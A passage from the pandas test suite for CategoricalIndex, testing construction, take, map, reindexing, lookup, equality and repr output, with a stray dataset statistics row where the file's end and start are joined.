tm.assert_categorical_equal(result.values, expected.values)
msg = ('When allow_fill=True and fill_value is not None, '
'all indices must be >= -1')
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -2]), fill_value=True)
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -5]), fill_value=True)
with pytest.raises(IndexError):
idx.take(np.array([1, -5]))
def test_take_fill_value_datetime(self):
# datetime category
idx = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'],
name='xxx')
idx = pd.CategoricalIndex(idx)
result = idx.take(np.array([1, 0, -1]))
expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
name='xxx')
expected = pd.CategoricalIndex(expected)
tm.assert_index_equal(result, expected)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', 'NaT'],
name='xxx')
exp_cats = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'])
expected = pd.CategoricalIndex(expected, categories=exp_cats)
tm.assert_index_equal(result, expected)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
name='xxx')
expected = pd.CategoricalIndex(expected)
tm.assert_index_equal(result, expected)
msg = ('When allow_fill=True and fill_value is not None, '
'all indices must be >= -1')
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -2]), fill_value=True)
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -5]), fill_value=True)
with pytest.raises(IndexError):
idx.take(np.array([1, -5]))
def test_take_invalid_kwargs(self):
idx = pd.CategoricalIndex([1, 2, 3], name='foo')
indices = [1, 0, -1]
msg = r"take\(\) got an unexpected keyword argument 'foo'"
tm.assert_raises_regex(TypeError, msg, idx.take,
indices, foo=2)
msg = "the 'out' parameter is not supported"
tm.assert_raises_regex(ValueError, msg, idx.take,
indices, out=indices)
msg = "the 'mode' parameter is not supported"
tm.assert_raises_regex(ValueError, msg, idx.take,
indices, mode='clip')
| 40.883568 | 148 | 0.538757 |
import pytest
import pandas.util.testing as tm
from pandas.core.indexes.api import Index, CategoricalIndex
from pandas.core.dtypes.dtypes import CategoricalDtype
from .common import Base
from pandas.compat import range, PY3
import numpy as np
from pandas import Categorical, IntervalIndex, compat
from pandas.util.testing import assert_almost_equal
import pandas.core.config as cf
import pandas as pd
if PY3:
unicode = lambda x: x
class TestCategoricalIndex(Base):
_holder = CategoricalIndex
def setup_method(self, method):
self.indices = dict(catIndex=tm.makeCategoricalIndex(100))
self.setup_indices()
def create_index(self, categories=None, ordered=False):
if categories is None:
categories = list('cab')
return CategoricalIndex(
list('aabbca'), categories=categories, ordered=ordered)
def test_construction(self):
ci = self.create_index(categories=list('abcd'))
categories = ci.categories
result = Index(ci)
tm.assert_index_equal(result, ci, exact=True)
assert not result.ordered
result = Index(ci.values)
tm.assert_index_equal(result, ci, exact=True)
assert not result.ordered
result = CategoricalIndex(categories=categories)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes, np.array([], dtype='int8'))
assert not result.ordered
result = CategoricalIndex(list('aabbca'), categories=categories)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
c = pd.Categorical(list('aabbca'))
result = CategoricalIndex(c)
tm.assert_index_equal(result.categories, Index(list('abc')))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
assert not result.ordered
result = CategoricalIndex(c, categories=categories)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
assert not result.ordered
ci = CategoricalIndex(c, categories=list('abcd'))
result = CategoricalIndex(ci)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
assert not result.ordered
result = CategoricalIndex(ci, categories=list('ab'))
tm.assert_index_equal(result.categories, Index(list('ab')))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, -1, 0], dtype='int8'))
assert not result.ordered
result = CategoricalIndex(ci, categories=list('ab'), ordered=True)
tm.assert_index_equal(result.categories, Index(list('ab')))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, -1, 0], dtype='int8'))
assert result.ordered
result = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True)
expected = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True,
dtype='category')
tm.assert_index_equal(result, expected, exact=True)
result = Index(np.array(ci))
assert isinstance(result, Index)
assert not isinstance(result, CategoricalIndex)
def test_construction_with_dtype(self):
ci = self.create_index(categories=list('abc'))
result = Index(np.array(ci), dtype='category')
tm.assert_index_equal(result, ci, exact=True)
result = Index(np.array(ci).tolist(), dtype='category')
tm.assert_index_equal(result, ci, exact=True)
ci = self.create_index()
result = Index(
np.array(ci), dtype='category').reorder_categories(ci.categories)
tm.assert_index_equal(result, ci, exact=True)
expected = CategoricalIndex([0, 1, 2], categories=[0, 1, 2],
ordered=True)
idx = Index(range(3))
result = CategoricalIndex(idx, categories=idx, ordered=True)
tm.assert_index_equal(result, expected, exact=True)
def test_construction_with_categorical_dtype(self):
data, cats, ordered = 'a a b b'.split(), 'c b a'.split(), True
dtype = CategoricalDtype(categories=cats, ordered=ordered)
result = pd.CategoricalIndex(data, dtype=dtype)
expected = pd.CategoricalIndex(data, categories=cats,
ordered=ordered)
tm.assert_index_equal(result, expected, exact=True)
with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
"`categories` or `ordered`."):
pd.CategoricalIndex(data, categories=cats, dtype=dtype)
with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
"`categories` or `ordered`."):
pd.CategoricalIndex(data, ordered=ordered, dtype=dtype)
def test_create_categorical(self):
# instances of CategoricalIndex, but we still want to test the code
ci = CategoricalIndex(['a', 'b', 'c'])
# First ci is self, second ci is data.
result = CategoricalIndex._create_categorical(ci, ci)
expected = Categorical(['a', 'b', 'c'])
tm.assert_categorical_equal(result, expected)
def test_disallow_set_ops(self):
# GH 10039
# set ops (+/-) raise TypeError
idx = pd.Index(pd.Categorical(['a', 'b']))
pytest.raises(TypeError, lambda: idx - idx)
pytest.raises(TypeError, lambda: idx + idx)
pytest.raises(TypeError, lambda: idx - ['a', 'b'])
pytest.raises(TypeError, lambda: idx + ['a', 'b'])
pytest.raises(TypeError, lambda: ['a', 'b'] - idx)
pytest.raises(TypeError, lambda: ['a', 'b'] + idx)
def test_method_delegation(self):
ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
result = ci.set_categories(list('cab'))
tm.assert_index_equal(result, CategoricalIndex(
list('aabbca'), categories=list('cab')))
ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
result = ci.rename_categories(list('efg'))
tm.assert_index_equal(result, CategoricalIndex(
list('ffggef'), categories=list('efg')))
# GH18862 (let rename_categories take callables)
result = ci.rename_categories(lambda x: x.upper())
tm.assert_index_equal(result, CategoricalIndex(
list('AABBCA'), categories=list('CAB')))
ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
result = ci.add_categories(['d'])
tm.assert_index_equal(result, CategoricalIndex(
list('aabbca'), categories=list('cabd')))
ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
result = ci.remove_categories(['c'])
tm.assert_index_equal(result, CategoricalIndex(
list('aabb') + [np.nan] + ['a'], categories=list('ab')))
ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
result = ci.as_unordered()
tm.assert_index_equal(result, ci)
ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
result = ci.as_ordered()
tm.assert_index_equal(result, CategoricalIndex(
list('aabbca'), categories=list('cabdef'), ordered=True))
# invalid
pytest.raises(ValueError, lambda: ci.set_categories(
list('cab'), inplace=True))
def test_contains(self):
ci = self.create_index(categories=list('cabdef'))
assert 'a' in ci
assert 'z' not in ci
assert 'e' not in ci
assert np.nan not in ci
# assert codes NOT in index
assert 0 not in ci
assert 1 not in ci
ci = CategoricalIndex(
list('aabbca') + [np.nan], categories=list('cabdef'))
assert np.nan in ci
def test_min_max(self):
ci = self.create_index(ordered=False)
pytest.raises(TypeError, lambda: ci.min())
pytest.raises(TypeError, lambda: ci.max())
ci = self.create_index(ordered=True)
assert ci.min() == 'c'
assert ci.max() == 'b'
def test_map(self):
ci = pd.CategoricalIndex(list('ABABC'), categories=list('CBA'),
ordered=True)
result = ci.map(lambda x: x.lower())
exp = pd.CategoricalIndex(list('ababc'), categories=list('cba'),
ordered=True)
tm.assert_index_equal(result, exp)
ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
ordered=False, name='XXX')
result = ci.map(lambda x: x.lower())
exp = pd.CategoricalIndex(list('ababc'), categories=list('bac'),
ordered=False, name='XXX')
tm.assert_index_equal(result, exp)
# GH 12766: Return an index not an array
tm.assert_index_equal(ci.map(lambda x: 1),
Index(np.array([1] * 5, dtype=np.int64),
name='XXX'))
# change categories dtype
ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
ordered=False)
def f(x):
return {'A': 10, 'B': 20, 'C': 30}.get(x)
result = ci.map(f)
exp = pd.CategoricalIndex([10, 20, 10, 20, 30],
categories=[20, 10, 30],
ordered=False)
tm.assert_index_equal(result, exp)
result = ci.map(pd.Series([10, 20, 30], index=['A', 'B', 'C']))
tm.assert_index_equal(result, exp)
result = ci.map({'A': 10, 'B': 20, 'C': 30})
tm.assert_index_equal(result, exp)
def test_map_with_categorical_series(self):
# GH 12756
a = pd.Index([1, 2, 3, 4])
b = pd.Series(["even", "odd", "even", "odd"],
dtype="category")
c = pd.Series(["even", "odd", "even", "odd"])
exp = CategoricalIndex(["odd", "even", "odd", np.nan])
tm.assert_index_equal(a.map(b), exp)
exp = pd.Index(["odd", "even", "odd", np.nan])
tm.assert_index_equal(a.map(c), exp)
@pytest.mark.parametrize('klass', [list, tuple, np.array, pd.Series])
def test_where(self, klass):
i = self.create_index()
cond = [True] * len(i)
expected = i
result = i.where(klass(cond))
tm.assert_index_equal(result, expected)
cond = [False] + [True] * (len(i) - 1)
expected = CategoricalIndex([np.nan] + i[1:].tolist(),
categories=i.categories)
result = i.where(klass(cond))
tm.assert_index_equal(result, expected)
def test_append(self):
ci = self.create_index()
categories = ci.categories
# append cats with the same categories
result = ci[:3].append(ci[3:])
tm.assert_index_equal(result, ci, exact=True)
foos = [ci[:1], ci[1:3], ci[3:]]
result = foos[0].append(foos[1:])
tm.assert_index_equal(result, ci, exact=True)
# empty
result = ci.append([])
tm.assert_index_equal(result, ci, exact=True)
# appending with different categories or reoreded is not ok
pytest.raises(
TypeError,
lambda: ci.append(ci.values.set_categories(list('abcd'))))
pytest.raises(
TypeError,
lambda: ci.append(ci.values.reorder_categories(list('abc'))))
# with objects
result = ci.append(Index(['c', 'a']))
expected = CategoricalIndex(list('aabbcaca'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# invalid objects
pytest.raises(TypeError, lambda: ci.append(Index(['a', 'd'])))
# GH14298 - if base object is not categorical -> coerce to object
result = Index(['c', 'a']).append(ci)
expected = Index(list('caaabbca'))
tm.assert_index_equal(result, expected, exact=True)
def test_insert(self):
ci = self.create_index()
categories = ci.categories
# test 0th element
result = ci.insert(0, 'a')
expected = CategoricalIndex(list('aaabbca'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# test Nth element that follows Python list behavior
result = ci.insert(-1, 'a')
expected = CategoricalIndex(list('aabbcaa'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# test empty
result = CategoricalIndex(categories=categories).insert(0, 'a')
expected = CategoricalIndex(['a'], categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# invalid
pytest.raises(TypeError, lambda: ci.insert(0, 'd'))
# GH 18295 (test missing)
expected = CategoricalIndex(['a', np.nan, 'a', 'b', 'c', 'b'])
for na in (np.nan, pd.NaT, None):
result = CategoricalIndex(list('aabcb')).insert(1, na)
tm.assert_index_equal(result, expected)
def test_delete(self):
ci = self.create_index()
categories = ci.categories
result = ci.delete(0)
expected = CategoricalIndex(list('abbca'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
result = ci.delete(-1)
expected = CategoricalIndex(list('aabbc'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
with pytest.raises((IndexError, ValueError)):
# Either depending on NumPy version
ci.delete(10)
def test_astype(self):
ci = self.create_index()
result = ci.astype(object)
tm.assert_index_equal(result, Index(np.array(ci)))
# this IS equal, but not the same class
assert result.equals(ci)
assert isinstance(result, Index)
assert not isinstance(result, CategoricalIndex)
# interval
ii = IntervalIndex.from_arrays(left=[-0.001, 2.0],
right=[2, 4],
closed='right')
ci = CategoricalIndex(Categorical.from_codes(
[0, 1, -1], categories=ii, ordered=True))
result = ci.astype('interval')
expected = ii.take([0, 1, -1])
tm.assert_index_equal(result, expected)
result = IntervalIndex.from_intervals(result.values)
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize('name', [None, 'foo'])
@pytest.mark.parametrize('dtype_ordered', [True, False])
@pytest.mark.parametrize('index_ordered', [True, False])
def test_astype_category(self, name, dtype_ordered, index_ordered):
# GH 18630
index = self.create_index(ordered=index_ordered)
if name:
index = index.rename(name)
# standard categories
dtype = CategoricalDtype(ordered=dtype_ordered)
result = index.astype(dtype)
expected = CategoricalIndex(index.tolist(),
name=name,
categories=index.categories,
ordered=dtype_ordered)
tm.assert_index_equal(result, expected)
# non-standard categories
dtype = CategoricalDtype(index.unique().tolist()[:-1], dtype_ordered)
result = index.astype(dtype)
expected = CategoricalIndex(index.tolist(), name=name, dtype=dtype)
tm.assert_index_equal(result, expected)
if dtype_ordered is False:
# dtype='category' can't specify ordered, so only test once
result = index.astype('category')
expected = index
tm.assert_index_equal(result, expected)
def test_reindex_base(self):
idx = CategoricalIndex(list("cab"), categories=list("cab"))
expected = np.arange(len(idx), dtype=np.intp)
actual = idx.get_indexer(idx)
tm.assert_numpy_array_equal(expected, actual)
with tm.assert_raises_regex(ValueError, "Invalid fill method"):
idx.get_indexer(idx, method="invalid")
def test_reindexing(self):
np.random.seed(123456789)
ci = self.create_index()
oidx = Index(np.array(ci))
for n in [1, 2, 5, len(ci)]:
finder = oidx[np.random.randint(0, len(ci), size=n)]
expected = oidx.get_indexer_non_unique(finder)[0]
actual = ci.get_indexer(finder)
tm.assert_numpy_array_equal(expected, actual)
for finder in [list("aabbca"), list("aababca")]:
expected = oidx.get_indexer_non_unique(finder)[0]
actual = ci.get_indexer(finder)
tm.assert_numpy_array_equal(expected, actual)
def test_reindex_dtype(self):
c = CategoricalIndex(['a', 'b', 'c', 'a'])
res, indexer = c.reindex(['a', 'c'])
tm.assert_index_equal(res, Index(['a', 'a', 'c']), exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'])
res, indexer = c.reindex(Categorical(['a', 'c']))
exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'],
categories=['a', 'b', 'c', 'd'])
res, indexer = c.reindex(['a', 'c'])
exp = Index(['a', 'a', 'c'], dtype='object')
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'],
categories=['a', 'b', 'c', 'd'])
res, indexer = c.reindex(Categorical(['a', 'c']))
exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
def test_reindex_empty_index(self):
c = CategoricalIndex([])
res, indexer = c.reindex(['a', 'b'])
tm.assert_index_equal(res, Index(['a', 'b']), exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([-1, -1], dtype=np.intp))
def test_is_monotonic(self):
c = CategoricalIndex([1, 2, 3])
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([1, 2, 3], ordered=True)
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1])
assert not c.is_monotonic_increasing
assert c.is_monotonic_decreasing
c = CategoricalIndex([1, 3, 2], categories=[3, 2, 1])
assert not c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1], ordered=True)
assert not c.is_monotonic_increasing
assert c.is_monotonic_decreasing
categories = [9, 0, 1, 2, 3]
c = CategoricalIndex([9, 0], categories=categories)
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([0, 1], categories=categories)
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
def test_duplicates(self):
idx = CategoricalIndex([0, 0, 0], name='foo')
assert not idx.is_unique
assert idx.has_duplicates
expected = CategoricalIndex([0], name='foo')
tm.assert_index_equal(idx.drop_duplicates(), expected)
tm.assert_index_equal(idx.unique(), expected)
def test_get_indexer(self):
idx1 = CategoricalIndex(list('aabcde'), categories=list('edabc'))
idx2 = CategoricalIndex(list('abf'))
for indexer in [idx2, list('abf'), Index(list('abf'))]:
r1 = idx1.get_indexer(idx2)
assert_almost_equal(r1, np.array([0, 1, 2, -1], dtype=np.intp))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='pad'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='backfill'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='nearest'))
def test_get_loc(self):
cidx1 = CategoricalIndex(list('abcde'), categories=list('edabc'))
idx1 = Index(list('abcde'))
assert cidx1.get_loc('a') == idx1.get_loc('a')
assert cidx1.get_loc('e') == idx1.get_loc('e')
for i in [cidx1, idx1]:
with pytest.raises(KeyError):
i.get_loc('NOT-EXIST')
cidx2 = CategoricalIndex(list('aacded'), categories=list('edabc'))
idx2 = Index(list('aacded'))
res = cidx2.get_loc('d')
tm.assert_numpy_array_equal(res, idx2.get_loc('d'))
tm.assert_numpy_array_equal(res, np.array([False, False, False,
True, False, True]))
res = cidx2.get_loc('e')
assert res == idx2.get_loc('e')
assert res == 4
for i in [cidx2, idx2]:
with pytest.raises(KeyError):
i.get_loc('NOT-EXIST')
cidx3 = CategoricalIndex(list('aabbb'), categories=list('abc'))
idx3 = Index(list('aabbb'))
res = cidx3.get_loc('a')
assert res == idx3.get_loc('a')
assert res == slice(0, 2, None)
res = cidx3.get_loc('b')
assert res == idx3.get_loc('b')
assert res == slice(2, 5, None)
for i in [cidx3, idx3]:
with pytest.raises(KeyError):
i.get_loc('c')
def test_repr_roundtrip(self):
ci = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
str(ci)
tm.assert_index_equal(eval(repr(ci)), ci, exact=True)
if PY3:
str(ci)
else:
compat.text_type(ci)
ci = CategoricalIndex(np.random.randint(0, 5, size=100))
if PY3:
str(ci)
else:
compat.text_type(ci)
def test_isin(self):
ci = CategoricalIndex(
list('aabca') + [np.nan], categories=['c', 'a', 'b'])
tm.assert_numpy_array_equal(
ci.isin(['c']),
np.array([False, False, False, True, False, False]))
tm.assert_numpy_array_equal(
ci.isin(['c', 'a', 'b']), np.array([True] * 5 + [False]))
tm.assert_numpy_array_equal(
ci.isin(['c', 'a', 'b', np.nan]), np.array([True] * 6))
result = ci.isin(ci.set_categories(list('abcdefghi')))
expected = np.array([True] * 6)
tm.assert_numpy_array_equal(result, expected)
result = ci.isin(ci.set_categories(list('defghi')))
expected = np.array([False] * 5 + [True])
tm.assert_numpy_array_equal(result, expected)
def test_identical(self):
ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
ordered=True)
assert ci1.identical(ci1)
assert ci1.identical(ci1.copy())
assert not ci1.identical(ci2)
def test_ensure_copied_data(self):
# gh-12309: Check the "copy" argument of each
# Index.__new__ is honored.
#
# Must be tested separately from other indexes because
# self.value is not an ndarray.
_base = lambda ar: ar if ar.base is None else ar.base
for index in self.indices.values():
result = CategoricalIndex(index.values, copy=True)
tm.assert_index_equal(index, result)
assert _base(index.values) is not _base(result.values)
result = CategoricalIndex(index.values, copy=False)
assert _base(index.values) is _base(result.values)
def test_equals_categorical(self):
ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
ordered=True)
assert ci1.equals(ci1)
assert not ci1.equals(ci2)
assert ci1.equals(ci1.astype(object))
assert ci1.astype(object).equals(ci1)
assert (ci1 == ci1).all()
assert not (ci1 != ci1).all()
assert not (ci1 > ci1).all()
assert not (ci1 < ci1).all()
assert (ci1 <= ci1).all()
assert (ci1 >= ci1).all()
assert not (ci1 == 1).all()
assert (ci1 == Index(['a', 'b'])).all()
assert (ci1 == ci1.values).all()
# invalid comparisons
with tm.assert_raises_regex(ValueError, "Lengths must match"):
ci1 == Index(['a', 'b', 'c'])
pytest.raises(TypeError, lambda: ci1 == ci2)
pytest.raises(
TypeError, lambda: ci1 == Categorical(ci1.values, ordered=False))
pytest.raises(
TypeError,
lambda: ci1 == Categorical(ci1.values, categories=list('abc')))
# tests
# make sure that we are testing for category inclusion properly
ci = CategoricalIndex(list('aabca'), categories=['c', 'a', 'b'])
assert not ci.equals(list('aabca'))
# Same categories, but different order
# Unordered
assert ci.equals(CategoricalIndex(list('aabca')))
# Ordered
assert not ci.equals(CategoricalIndex(list('aabca'), ordered=True))
assert ci.equals(ci.copy())
ci = CategoricalIndex(list('aabca') + [np.nan],
categories=['c', 'a', 'b'])
assert not ci.equals(list('aabca'))
assert not ci.equals(CategoricalIndex(list('aabca')))
assert ci.equals(ci.copy())
ci = CategoricalIndex(list('aabca') + [np.nan],
categories=['c', 'a', 'b'])
assert not ci.equals(list('aabca') + [np.nan])
assert ci.equals(CategoricalIndex(list('aabca') + [np.nan]))
assert not ci.equals(CategoricalIndex(list('aabca') + [np.nan],
ordered=True))
assert ci.equals(ci.copy())
def test_string_categorical_index_repr(self):
# short
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'])
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc'], categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc'], categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 10)
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb',
'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc',
u'a', u'bb', u'ccc', u'a', u'bb', u'ccc'],
categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 100)
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
...
'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
categories=['a', 'bb', 'ccc'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
u'ccc', u'a',
...
u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
u'bb', u'ccc'],
categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list('abcdefghijklmmo'))
if PY3:
expected = u"""CategoricalIndex(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
'm', 'm', 'o'],
categories=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', u'i', u'j',
u'k', u'l', u'm', u'm', u'o'],
categories=[u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# short
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう',
u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
...
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ',
...
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
if PY3:
expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ', 'さ', 'し',
'す', 'せ', 'そ'],
categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', u'け', u'こ',
u'さ', u'し', u'す', u'せ', u'そ'],
categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# Emable Unicode option -----------------------------------------
with cf.option_context('display.unicode.east_asian_width', True):
# short
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう'],
